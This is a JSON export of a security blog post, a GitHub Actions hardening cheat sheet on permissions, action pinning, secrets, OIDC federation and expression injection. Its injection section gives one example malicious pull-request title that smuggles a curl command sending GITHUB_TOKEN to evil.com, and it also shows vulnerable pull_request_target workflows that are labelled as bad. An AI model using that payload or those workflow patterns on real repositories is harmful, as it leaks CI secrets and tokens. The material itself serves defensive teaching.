{"id":798,"date":"2026-03-25T09:39:30","date_gmt":"2026-03-25T08:39:30","guid":{"rendered":"https:\/\/secure-pipelines.com\/uncategorized\/github-actions-security-cheat-sheet\/"},"modified":"2026-03-25T09:39:30","modified_gmt":"2026-03-25T08:39:30","slug":"github-actions-security-cheat-sheet","status":"publish","type":"post","link":"https:\/\/secure-pipelines.com\/ar\/ci-cd-security\/github-actions-security-cheat-sheet\/","title":{"rendered":"GitHub Actions Security Cheat Sheet: Permissions, Pinning, Secrets, and OIDC"},"content":{"rendered":"<h2>1. Permissions \u2014 The Principle of Least Privilege<\/h2>\n<p>The most important change you can make to any GitHub Actions workflow is restricting permissions. By default, <code>GITHUB_TOKEN<\/code> has <strong>read and write permissions<\/strong> on most scopes. Change that immediately.<\/p>\n<h3>Read-Only Permissions by Default (Top Level)<\/h3>\n<p>Put this at the <strong>top of every workflow file<\/strong> to make read-only the default for all jobs:<\/p>\n<pre><code class=\"language-yaml\"># .github\/workflows\/ci.yml\nname: CI\non: [push, pull_request]\n\npermissions: read-all\n\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@v4<\/code><\/pre>\n<h3>Empty Permissions (No Access)<\/h3>\n<p>For jobs that never touch the GitHub APIs or the repository, remove all permissions entirely:<\/p>\n<pre><code class=\"language-yaml\">jobs:\n  lint:\n    runs-on: ubuntu-latest\n    permissions: {}\n    steps:\n      - uses: actions\/checkout@v4\n      - run: npm run lint<\/code><\/pre>\n<p><strong>Why this works:<\/strong> <code>actions\/checkout<\/code> uses the token for private repositories but falls back to an anonymous clone for public ones. If your repository is public, <code>permissions: {}<\/code> is safe for the checkout step.<\/p>\n<h3>Per-Job Permission Recipes<\/h3>\n<p>Grant each job only what it needs:<\/p>\n<pre><code class=\"language-yaml\"># Checkout only (private repo)\njobs:\n  test:\n    permissions:\n      contents: read\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@v4\n\n# Deploy to GitHub Pages\njobs:\n  deploy-pages:\n    permissions:\n      pages: write\n      id-token: write\n    runs-on: ubuntu-latest\n\n# Push to GitHub Container Registry (GHCR)\njobs:\n  push-image:\n    permissions:\n      contents: read\n      packages: write\n    runs-on: ubuntu-latest\n\n# Create a GitHub Release\njobs:\n  release:\n    permissions:\n      contents: write\n    runs-on: ubuntu-latest\n\n# Comment on a Pull Request\njobs:\n  comment:\n    permissions:\n      pull-requests: write\n    runs-on: ubuntu-latest<\/code><\/pre>\n<p><strong>Rule of thumb:<\/strong> start with <code>permissions: {}<\/code> and add scopes one at a time until the job succeeds. Never leave the default read-write permissions in place.<\/p>\n
<h2>2. Pinning Actions \u2014 Stop Using Tags<\/h2>\n<p>Tags like <code>@v4<\/code> are mutable. An attacker who compromises a popular action can move the tag to a malicious commit. <strong>Pin every third-party action to its full commit SHA.<\/strong><\/p>\n<h3>Pinned vs. Unpinned<\/h3>\n<pre><code class=\"language-yaml\"># DANGEROUS \u2014 tag can be moved to any commit\n- uses: actions\/checkout@v4\n\n# SAFE \u2014 immutable commit reference\n- uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1<\/code><\/pre>\n<p>The trailing comment keeps the line readable, while the SHA locks in the exact code you reviewed.<\/p>\n<h3>Finding the SHA for Any Action<\/h3>\n<pre><code class=\"language-bash\"># Get the full SHA for a specific tag\n# (an annotated tag also prints a peeled \"v4.1.1^{}\" line; that peeled value is the commit SHA to pin)\ngit ls-remote --tags https:\/\/github.com\/actions\/checkout.git v4.1.1\n\n# Or use the GitHub API\n# (for an annotated tag this returns the tag object, not the commit; resolve it before pinning)\ngh api repos\/actions\/checkout\/git\/ref\/tags\/v4.1.1 --jq '.object.sha'<\/code><\/pre>\n<h3>Automating Updates with Dependabot<\/h3>\n<p>Pinning to a SHA does not mean you stop updating. Let Dependabot propose version upgrades automatically:<\/p>\n<pre><code class=\"language-yaml\"># .github\/dependabot.yml\nversion: 2\nupdates:\n  - package-ecosystem: github-actions\n    directory: \"\/\"\n    schedule:\n      interval: weekly\n    commit-message:\n      prefix: \"ci\"\n    reviewers:\n      - \"your-org\/security-team\"\n    labels:\n      - \"dependencies\"\n      - \"ci\"<\/code><\/pre>\n<p>Dependabot understands SHA pins. It updates the SHA <em>and<\/em> the version tag in the trailing comment in a single pull request.<\/p>\n<h2>3. Secrets Management<\/h2>\n<p>GitHub offers three scopes for secrets. Choose the right one to minimize the blast radius.<\/p>\n<h3>Secret Scope Comparison<\/h3>\n<table>\n<thead>\n<tr>\n<th>Scope<\/th>\n<th>Visibility<\/th>\n<th>Best For<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><strong>Repository<\/strong><\/td>\n<td>All workflows in a single repository<\/td>\n<td>Repository-specific API keys and tokens<\/td>\n<\/tr>\n<tr>\n<td><strong>Environment<\/strong><\/td>\n<td>Only jobs that target that environment<\/td>\n<td>Production credentials, deploy keys<\/td>\n<\/tr>\n<tr>\n<td><strong>Organization<\/strong><\/td>\n<td>Selected repositories across the organization<\/td>\n<td>Shared service accounts, registry credentials<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Environment Protection Rules<\/h3>\n<p>Environments let you gate deployments behind approvals, wait timers, and branch restrictions:<\/p>\n<pre><code class=\"language-yaml\">jobs:\n  deploy-production:\n    runs-on: ubuntu-latest\n    environment:\n      name: production\n      url: https:\/\/app.example.com\n    permissions:\n      id-token: write\n      contents: read\n    steps:\n      - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1\n      - name: Deploy\n        run: .\/deploy.sh\n        env:\n          DEPLOY_KEY: ${{ secrets.PRODUCTION_DEPLOY_KEY }}<\/code><\/pre>\n<p>Then configure the <code>production<\/code> environment under <strong>Settings \u2192 Environments<\/strong> with:<\/p>\n<ul>\n<li>Required reviewers (at least one)<\/li>\n<li>A wait timer (e.g. 5 minutes)<\/li>\n<li>Deployment branch restrictions: <code>main<\/code> only<\/li>\n<\/ul>\n<h3>Danger Zone: pull_request vs. pull_request_target<\/h3>\n<p>This is one of the most dangerous misunderstandings in GitHub Actions:<\/p>\n<table>\n<thead>\n<tr>\n<th>Trigger<\/th>\n<th>Code Checked Out<\/th>\n<th>Secrets Available?<\/th>\n<th>Risk<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>pull_request<\/code><\/td>\n<td>PR merge commit<\/td>\n<td>No (for forks)<\/td>\n<td>Low<\/td>\n<\/tr>\n<tr>\n<td><code>pull_request_target<\/code><\/td>\n<td>Base branch<\/td>\n<td><strong>Yes<\/strong><\/td>\n<td><strong>Critical if you check out PR code<\/strong><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>Never do this:<\/strong><\/p>\n<pre><code class=\"language-yaml\"># CRITICAL VULNERABILITY \u2014 secrets exposed to fork PR code\non: pull_request_target\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions\/checkout@v4\n        with:\n          ref: ${{ github.event.pull_request.head.sha }}  # Checks out UNTRUSTED fork code\n      - run: .\/build.sh  # Runs attacker-controlled code WITH secrets<\/code><\/pre>\n<p>If you need <code>pull_request_target<\/code>, never check out the PR head. Use it only for labeling or commenting, running against base-branch code.<\/p>\n
<h2>4. OIDC \/ Workload Identity Federation<\/h2>\n<p>Stop storing long-lived cloud credentials as secrets. Use OpenID Connect to obtain short-lived tokens directly from your cloud provider.<\/p>\n<p><strong>Required permissions block for every OIDC workflow:<\/strong><\/p>\n<pre><code class=\"language-yaml\">permissions:\n  id-token: write   # Required to request the OIDC JWT\n  contents: read    # Required for actions\/checkout<\/code><\/pre>\n<h3>AWS \u2014 OIDC Configuration<\/h3>\n<pre><code class=\"language-yaml\">- name: Configure AWS Credentials\n  uses: aws-actions\/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502 # v4.0.2\n  with:\n    role-to-assume: arn:aws:iam::123456789012:role\/GitHubActions\n    aws-region: us-east-1<\/code><\/pre>\n<p><strong>AWS trust policy template:<\/strong><\/p>\n<pre><code class=\"language-json\">{\n  \"Version\": \"2012-10-17\",\n  \"Statement\": [\n    {\n      \"Effect\": \"Allow\",\n      \"Principal\": {\n        \"Federated\": \"arn:aws:iam::123456789012:oidc-provider\/token.actions.githubusercontent.com\"\n      },\n      \"Action\": \"sts:AssumeRoleWithWebIdentity\",\n      \"Condition\": {\n        \"StringEquals\": {\n          \"token.actions.githubusercontent.com:aud\": \"sts.amazonaws.com\"\n        },\n        \"StringLike\": {\n          \"token.actions.githubusercontent.com:sub\": \"repo:your-org\/your-repo:ref:refs\/heads\/main\"\n        }\n      }\n    }\n  ]\n}<\/code><\/pre>\n<h3>GCP \u2014 Workload Identity Federation<\/h3>\n<pre><code class=\"language-yaml\">- name: Authenticate to Google Cloud\n  uses: google-github-actions\/auth@55bd8e7c523b4b80c1b4b5e492ffb613a15f2591 # v2.1.3\n  with:\n    workload_identity_provider: projects\/123456\/locations\/global\/workloadIdentityPools\/github\/providers\/github\n    service_account: github-actions@my-project.iam.gserviceaccount.com<\/code><\/pre>\n<h3>Azure \u2014 Federated Credentials<\/h3>\n<pre><code class=\"language-yaml\">- name: Azure Login\n  uses: azure\/login@6c251865b4e6290e7b78be643ea2d005bc51f69a # v2.1.1\n  with:\n    client-id: ${{ secrets.AZURE_CLIENT_ID }}\n    tenant-id: ${{ secrets.AZURE_TENANT_ID }}\n    subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}<\/code><\/pre>\n<p><strong>Key benefit:<\/strong> no static credentials are stored anywhere. Tokens expire within minutes. The trust policy restricts which repositories, branches, and environments can assume the role.<\/p>\n
<h2>5. Workflow Triggers \u2014 Safe vs. Dangerous<\/h2>\n<p>Not all triggers are equal. Some run code from untrusted sources or grant elevated permissions.<\/p>\n<h3>Trigger Safety Table<\/h3>\n<table>\n<thead>\n<tr>\n<th>Trigger<\/th>\n<th>Risk Level<\/th>\n<th>Notes<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><code>push<\/code><\/td>\n<td>Low<\/td>\n<td>Only runs code that is already merged<\/td>\n<\/tr>\n<tr>\n<td><code>pull_request<\/code><\/td>\n<td>Low<\/td>\n<td>No secrets for forks<\/td>\n<\/tr>\n<tr>\n<td><code>schedule<\/code><\/td>\n<td>Low<\/td>\n<td>Runs on the default branch<\/td>\n<\/tr>\n<tr>\n<td><code>workflow_dispatch<\/code><\/td>\n<td>Medium<\/td>\n<td>Manual trigger \u2014 validate the inputs<\/td>\n<\/tr>\n<tr>\n<td><code>pull_request_target<\/code><\/td>\n<td><strong>High<\/strong><\/td>\n<td>Secrets available \u2014 see Section 3<\/td>\n<\/tr>\n<tr>\n<td><code>issue_comment<\/code><\/td>\n<td><strong>High<\/strong><\/td>\n<td>Any commenter can trigger it \u2014 gate it with permission checks<\/td>\n<\/tr>\n<tr>\n<td><code>workflow_run<\/code><\/td>\n<td><strong>High<\/strong><\/td>\n<td>Inherits the elevated context of the triggering workflow<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Branch and Path Filtering<\/h3>\n<p>Reduce unnecessary runs and limit exposure:<\/p>\n<pre><code class=\"language-yaml\">on:\n  push:\n    branches:\n      - main\n      - 'releases\/**'\n    # paths and paths-ignore cannot both be set for the same event;\n    # express exclusions as negated patterns inside paths instead\n    paths:\n      - 'src\/**'\n      - 'package.json'\n      - '!docs\/**'\n      - '!*.md'<\/code><\/pre>\n<h3>Concurrency Control<\/h3>\n<p>Prevent multiple deployments from racing each other:<\/p>\n<pre><code class=\"language-yaml\">concurrency:\n  group: deploy-${{ github.ref }}\n  cancel-in-progress: false  # Don't cancel in-flight deploys\n\n# For PR builds where canceling old runs is safe:\nconcurrency:\n  group: ci-${{ github.event.pull_request.number || github.sha }}\n  cancel-in-progress: true<\/code><\/pre>\n
<h2>6. Third-Party Action Security<\/h2>\n<p>Every <code>uses:<\/code> line in your workflow is a supply-chain dependency. Treat it like any other dependency.<\/p>\n<h3>Vetting Checklist<\/h3>\n<p>Before adopting any third-party action, check:<\/p>\n<ul>\n<li><strong>Publisher:<\/strong> does it come from a verified creator or a well-known organization (e.g. <code>actions\/*<\/code>, <code>aws-actions\/*<\/code>)?<\/li>\n<li><strong>Source code:<\/strong> have you read <code>action.yml<\/code> and the entry-point script?<\/li>\n<li><strong>Permissions:<\/strong> does it request more than it needs?<\/li>\n<li><strong>Stars \/ usage:<\/strong> rarely used actions carry higher risk.<\/li>\n<li><strong>Maintenance:<\/strong> when was the last commit? Are issues being addressed?<\/li>\n<li><strong>Dependencies:<\/strong> does it pull in a huge <code>node_modules<\/code> tree?<\/li>\n<\/ul>\n<h3>Fork Critical Actions<\/h3>\n<p>For actions that run in sensitive pipelines, fork them into your own organization:<\/p>\n<pre><code class=\"language-yaml\"># Instead of:\n- uses: some-random-org\/deploy-action@v2\n\n# Fork and pin:\n- uses: your-org\/deploy-action@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2<\/code><\/pre>\n<p>Create a scheduled workflow to sync your fork, and review the diff before merging upstream changes.<\/p>\n<h3>CODEOWNERS for Workflow Files<\/h3>\n<p>Require a security-team review for any change to a workflow:<\/p>\n<pre><code class=\"language-bash\"># .github\/CODEOWNERS\n.github\/workflows\/   @your-org\/security-team\n.github\/actions\/      @your-org\/security-team<\/code><\/pre>\n<p>Combine this with branch protection rules that require CODEOWNERS approval so that it is actually enforced.<\/p>\n<h2>7. Preventing Expression Injection<\/h2>\n<p>GitHub Actions expressions (<code>${{ }}<\/code>) are expanded as templates <em>before<\/em> the shell ever sees them. If an attacker controls the value, they control your shell.<\/p>\n<h3>The Dangerous Pattern<\/h3>\n<pre><code class=\"language-yaml\"># VULNERABLE \u2014 attacker controls the PR title\n- name: Echo PR title\n  run: echo \"PR: ${{ github.event.pull_request.title }}\"<\/code><\/pre>\n<p>A malicious PR title such as <code>Fix\"; curl http:\/\/evil.com\/steal?token=$GITHUB_TOKEN #<\/code> breaks out of the echo command and leaks the token.<\/p>\n<p><strong>Dangerous contexts that carry user input:<\/strong><\/p>\n<ul>\n<li><code>github.event.pull_request.title<\/code><\/li>\n<li><code>github.event.pull_request.body<\/code><\/li>\n<li><code>github.event.issue.title<\/code><\/li>\n<li><code>github.event.issue.body<\/code><\/li>\n<li><code>github.event.comment.body<\/code><\/li>\n<li><code>github.event.review.body<\/code><\/li>\n<li><code>github.event.head_commit.message<\/code><\/li>\n<li><code>github.head_ref<\/code> (branch name from forks)<\/li>\n<\/ul>\n<h3>The Safe Alternative \u2014 Environment Variables<\/h3>\n<pre><code class=\"language-yaml\"># SAFE \u2014 value is passed as an environment variable, not injected into the script\n- name: Echo PR title\n  run: echo \"PR: $PR_TITLE\"\n  env:\n    PR_TITLE: ${{ github.event.pull_request.title }}<\/code><\/pre>\n<p>When the value passes through an environment variable, the shell treats it as data rather than code. This is the fix for <strong>every<\/strong> expression injection.<\/p>\n<h3>Safe Use in Conditions<\/h3>\n<p>Expressions in <code>if:<\/code> conditions are safe because the Actions runtime evaluates them, not the shell:<\/p>\n<pre><code class=\"language-yaml\"># SAFE \u2014 evaluated by Actions runtime, not shell\n- name: Check label\n  if: contains(github.event.pull_request.labels.*.name, 'deploy')\n  run: echo \"Deploy label found\"<\/code><\/pre>\n
<h2>8. Common Mistakes \u2014 Top 5 with Fixes<\/h2>\n<h3>Mistake 1: Default (Excessive) Token Permissions<\/h3>\n<pre><code class=\"language-yaml\"># BAD \u2014 implicit read-write on everything\non: push\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps: ...\n\n# FIXED \u2014 explicit read-only default\non: push\npermissions: read-all\njobs:\n  build:\n    runs-on: ubuntu-latest\n    steps: ...<\/code><\/pre>\n<h3>Mistake 2: Using Mutable Tags for Actions<\/h3>\n<pre><code class=\"language-yaml\"># BAD\n- uses: actions\/setup-node@v4\n\n# FIXED\n- uses: actions\/setup-node@60edb5dd545a775178f52524783378180af0d1f8 # v4.0.2<\/code><\/pre>\n<h3>Mistake 3: Long-Lived Cloud Credentials as Secrets<\/h3>\n<pre><code class=\"language-yaml\"># BAD \u2014 static AWS keys that never expire\nenv:\n  AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}\n  AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}\n\n# FIXED \u2014 OIDC federation, no stored credentials\n- uses: aws-actions\/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502 # v4.0.2\n  with:\n    role-to-assume: arn:aws:iam::123456789012:role\/GitHubActions\n    aws-region: us-east-1<\/code><\/pre>\n<h3>Mistake 4: Checking Out PR Code in pull_request_target<\/h3>\n<pre><code class=\"language-yaml\"># BAD \u2014 runs untrusted code with secrets\non: pull_request_target\nsteps:\n  - uses: actions\/checkout@v4\n    with:\n      ref: ${{ github.event.pull_request.head.sha }}\n  - run: make build\n\n# FIXED \u2014 use pull_request trigger (no secrets for forks)\non: pull_request\nsteps:\n  - uses: actions\/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1\n  - run: make build<\/code><\/pre>\n<h3>Mistake 5: Expression Injection via run:<\/h3>\n<pre><code class=\"language-yaml\"># BAD \u2014 direct interpolation of user input\n- run: echo \"Issue: ${{ github.event.issue.title }}\"\n\n# FIXED \u2014 pass through environment variable\n- run: echo \"Issue: $ISSUE_TITLE\"\n  env:\n    ISSUE_TITLE: ${{ github.event.issue.title }}<\/code><\/pre>\n<h2>Quick Reference Card<\/h2>\n<table>\n<thead>\n<tr>\n<th>Practice<\/th>\n<th>Summary<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Default permissions<\/td>\n<td><code>permissions: read-all<\/code> at the top of the workflow<\/td>\n<\/tr>\n<tr>\n<td>Action pinning<\/td>\n<td>Use the full 40-character SHA + a version-tag comment<\/td>\n<\/tr>\n<tr>\n<td>Automatic pin updates<\/td>\n<td>Dependabot with the <code>github-actions<\/code> ecosystem<\/td>\n<\/tr>\n<tr>\n<td>Cloud authentication<\/td>\n<td>OIDC federation, never static keys<\/td>\n<\/tr>\n<tr>\n<td>Secrets protection<\/td>\n<td>Environment scopes + protection rules<\/td>\n<\/tr>\n<tr>\n<td>Injection prevention<\/td>\n<td>Always use <code>env:<\/code> for user-controlled values<\/td>\n<\/tr>\n<tr>\n<td>Workflow review<\/td>\n<td>CODEOWNERS on <code>.github\/workflows\/<\/code><\/td>\n<\/tr>\n<tr>\n<td>Avoiding dangerous triggers<\/td>\n<td>Avoid <code>pull_request_target<\/code> + checkout<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Applying even half of these practices puts your CI\/CD pipeline ahead of most organizations. 
\u0627\u0628\u062f\u0623 \u0628\u0627\u0644\u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0648\u0627\u0644\u062a\u062b\u0628\u064a\u062a \u2014 \u064a\u0633\u062a\u063a\u0631\u0642\u0627\u0646 \u062e\u0645\u0633 \u062f\u0642\u0627\u0626\u0642 \u0648\u064a\u0632\u064a\u0644\u0627\u0646 \u0641\u0626\u0627\u062a \u0643\u0627\u0645\u0644\u0629 \u0645\u0646 \u0647\u062c\u0645\u0627\u062a \u0633\u0644\u0633\u0644\u0629 \u0627\u0644\u062a\u0648\u0631\u064a\u062f. \u062b\u0645 \u0627\u0639\u0645\u0644 \u0639\u0644\u0649 \u0627\u062a\u062d\u0627\u062f OIDC \u0648\u0645\u0646\u0639 \u062d\u0642\u0646 \u0627\u0644\u062a\u0639\u0628\u064a\u0631\u0627\u062a \u0644\u0633\u062f \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0628\u0642\u064a\u0629.<\/p>\n<p>\u0644\u0644\u062a\u062f\u0631\u064a\u0628 \u0627\u0644\u0639\u0645\u0644\u064a\u060c \u0627\u0633\u062a\u0643\u0634\u0641 <a href=\"https:\/\/secure-pipelines.com\/ar\/category\/ci-cd-security\/\">\u0645\u062e\u062a\u0628\u0631\u0627\u062a \u0623\u0645\u0627\u0646 CI\/CD<\/a> \u0648<a href=\"https:\/\/secure-pipelines.com\/ar\/category\/github-actions\/\">\u0623\u062f\u0644\u0629 GitHub Actions<\/a> \u0644\u0631\u0624\u064a\u0629 \u0647\u0630\u0647 \u0627\u0644\u0623\u0646\u0645\u0627\u0637 \u0645\u0637\u0628\u0642\u0629 \u0641\u064a \u0633\u064a\u0646\u0627\u0631\u064a\u0648\u0647\u0627\u062a \u0648\u0627\u0642\u0639\u064a\u0629.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>1. 
Permissions: The Principle of Least Privilege The most important change you can make to any GitHub Actions workflow is restricting permissions. By default, GITHUB_TOKEN has read and write permissions on most scopes. Change that immediately. Default read-only permissions (top level) Put this at the top of every workflow file to make read-only the mode &#8230; <a title=\"GitHub Actions Security Cheat Sheet: Permissions, Pinning, Secrets, and OIDC\" class=\"read-more\" href=\"https:\/\/secure-pipelines.com\/ar\/ci-cd-security\/github-actions-security-cheat-sheet\/\" aria-label=\"Read more about GitHub Actions Security Cheat Sheet: 
Permissions, Pinning, Secrets, and OIDC\">Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,29],"tags":[],"post_folder":[],"class_list":["post-798","post","type-post","status-publish","format-standard","hentry","category-ci-cd-security","category-github-actions"],"_links":{"self":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts\/798","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/comments?post=798"}],"version-history":[{"count":0,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/posts\/798\/revisions"}],"wp:attachment":[{"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/media?parent=798"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/categories?post=798"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/tags?post=798"},{"taxonomy":"post_folder","embeddable":true,"href":"https:\/\/secure-pipelines.com\/ar\/wp-json\/wp\/v2\/post_folder?post=798"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}